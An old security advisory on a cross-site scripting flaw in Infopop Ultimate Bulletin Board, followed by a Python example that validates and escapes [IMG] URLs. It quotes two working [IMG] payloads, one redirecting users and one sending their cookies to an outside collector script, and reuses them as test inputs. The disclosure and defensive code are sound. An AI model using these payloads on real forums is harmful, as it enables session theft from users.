
UBB - Retrieve user cookies
16th Nov 2001 [SBWID-4861]
COMMAND

	Infopop Ultimate Bulletin Board

SYSTEMS AFFECTED

	Up to 5.47e

PROBLEM

	kyprizel <kyprizel@hostel.tusur.ru> posted:
	

	Posting something like this UBB tag:
	 

	[IMG]http://about:test\"onerror=\"top.location.href=\'http://punk.tomsk.ru\';[/IMG]

	

	to Infopop Ultimate Bulletin Board, we are able to redirect the user's
	browser to http://punk.tomsk.ru. There are many ways to steal cookies
	using this vulnerability, one of them:
	 

	[IMG]http://about:test\"onerror=\"this.src=\'http://somedomain.com/yourscript.php\'[/IMG]

	   

	and yourscript.php is a script to receive users' cookies 8)
	  

SOLUTION

	Upgrade available since February 2001
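
	Where a similar [IMG] handler has to be reviewed or hardened, the defence is to validate the URL and escape it before it reaches the src attribute. The following is an added example, not Infopop's code or its actual fix; render_post, is_safe_image_url and the scheme allow-list are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Hypothetical renderer written for this example; UBB itself is not shown on the page.
IMG_TAG = re.compile(r"\[IMG\](.*?)\[/IMG\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}
# Characters that could end a quoted attribute value or start new markup.
UNSAFE_CHARS = re.compile(r"[\s\"'<>\\`\x00-\x1f\x7f]")

# The two tags quoted in the advisory, used as negative test input.
ADVISORY_TAGS = [
    r"""[IMG]http://about:test\"onerror=\"top.location.href=\'http://punk.tomsk.ru\';[/IMG]""",
    r"""[IMG]http://about:test\"onerror=\"this.src=\'http://somedomain.com/yourscript.php\'[/IMG]""",
]

def is_safe_image_url(url):
    """Allow only absolute http(s) URLs with a host, a numeric port and no attribute-breaking characters."""
    if UNSAFE_CHARS.search(url):
        return False
    try:
        parts = urlsplit(url)
        parts.port  # raises ValueError for a non-numeric port such as "about:test"
    except ValueError:
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.hostname)

def render_post(post):
    """Return HTML for a post: all text is escaped, and [IMG] becomes <img> only for validated URLs."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(post):
        out.append(html.escape(post[pos:m.start()], quote=True))
        url = m.group(1).strip()
        if is_safe_image_url(url):
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        else:
            # Rejected tags are shown as inert, escaped text instead of markup.
            out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(post[pos:], quote=True))
    return "".join(out)

if __name__ == "__main__":
    for tag in ADVISORY_TAGS:
        print(render_post(tag))
    print(render_post("[IMG]http://example.com/a.png?x=1&y=2[/IMG]"))
```

	Both tags from the advisory come out as escaped text with no img element, while an ordinary image URL is rendered with its ampersand escaped.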
